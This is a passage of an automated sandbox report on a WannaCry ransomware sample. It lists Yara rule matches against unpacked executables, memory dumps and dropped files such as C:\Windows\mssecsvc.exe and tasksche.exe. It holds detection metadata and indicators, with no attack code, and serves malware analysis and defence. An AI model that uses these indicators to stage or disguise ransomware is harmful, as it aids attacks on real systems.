                Source: Yara matchFile source: 5.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.1fc8084.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.251f96c.8.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.1ffa128.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.24fc948.9.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.24f88e8.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.1fd7104.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.1fd7104.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.24fc948.9.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 10.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 7.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.1ffa128.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.24ed8c8.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.251f96c.8.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.mssecsvc.exe.1fd30a4.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000000.299041291.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.817946174.000000000042E000.00000004.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.306091681.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.301622527.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.295691374.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.306395360.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.301358010.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.302971579.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.297200452.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.313837823.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.317584322.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.817996874.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.297315623.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.306519342.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.301466734.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.308634142.000000000040F000.00000008.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.313956053.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.295748981.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.818892298.0000000001FD7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.308739689.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.299133974.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.317673463.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000000.301753612.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000000.306158904.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.820822570.00000000024FC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000000.303052057.0000000000710000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 1008, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 5232, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: mssecsvc.exe PID: 492, type: MEMORYSTR
                Source: Yara matchFile source: C:\Windows\tasksche.exe, type: DROPPED
                Source: Yara matchFile source: C:\Windows\mssecsvc.exe, type: DROPPED

                System Summary

                barindex
                Source: mbXvGlj2dR.dll, type: SAMPLEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: mbXvGlj2dR.dll, type: SAMPLEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 8.2.mssecsvc.exe.1fc8084.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 7.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.0.mssecsvc.exe.7100a4.7.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 5.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 8.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 7.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.1fc8084.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.1fc8084.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 8.2.mssecsvc.exe.1fc8084.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 8.2.mssecsvc.exe.1fc8084.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 5.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 5.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 7.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 5.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 5.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.251f96c.8.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.251f96c.8.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 8.2.mssecsvc.exe.251f96c.8.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 8.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 7.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 5.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.0.mssecsvc.exe.7100a4.3.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 5.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.0.mssecsvc.exe.7100a4.5.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 8.0.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.1ffa128.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.1ffa128.5.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 8.2.mssecsvc.exe.1ffa128.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 10.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 10.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 10.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.24fc948.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.24fc948.9.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 8.2.mssecsvc.exe.24fc948.9.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 9.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 9.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 9.2.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 8.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 7.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 7.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.0.mssecsvc.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 7.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 7.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 5.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 5.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.2.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.24f88e8.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.24f88e8.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 7.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 7.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.0.mssecsvc.exe.400000.2.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.24ed8c8.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.0.mssecsvc.exe.7100a4.3.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.1fd7104.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.1fd7104.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 8.2.mssecsvc.exe.1fd7104.4.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.0.mssecsvc.exe.7100a4.7.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.1fd7104.4.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.1fd7104.4.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 5.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.2.mssecsvc.exe.24fc948.9.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.2.mssecsvc.exe.24fc948.9.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 7.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 8.0.mssecsvc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 5.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 7.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (based on rule by US CERT)
                Source: 7.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.0.mssecsvc.exe.400000.6.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 5.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.0.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 7.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.2.mssecsvc.exe.7100a4.1.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 5.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 5.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 5.2.mssecsvc.exe.7100a4.1.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 7.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 7.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
                Source: 7.0.mssecsvc.exe.7100a4.5.raw.unpack, type: UNPACKEDPEMatched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
                Source: 9.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
                Source: 9.0.tasksche.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
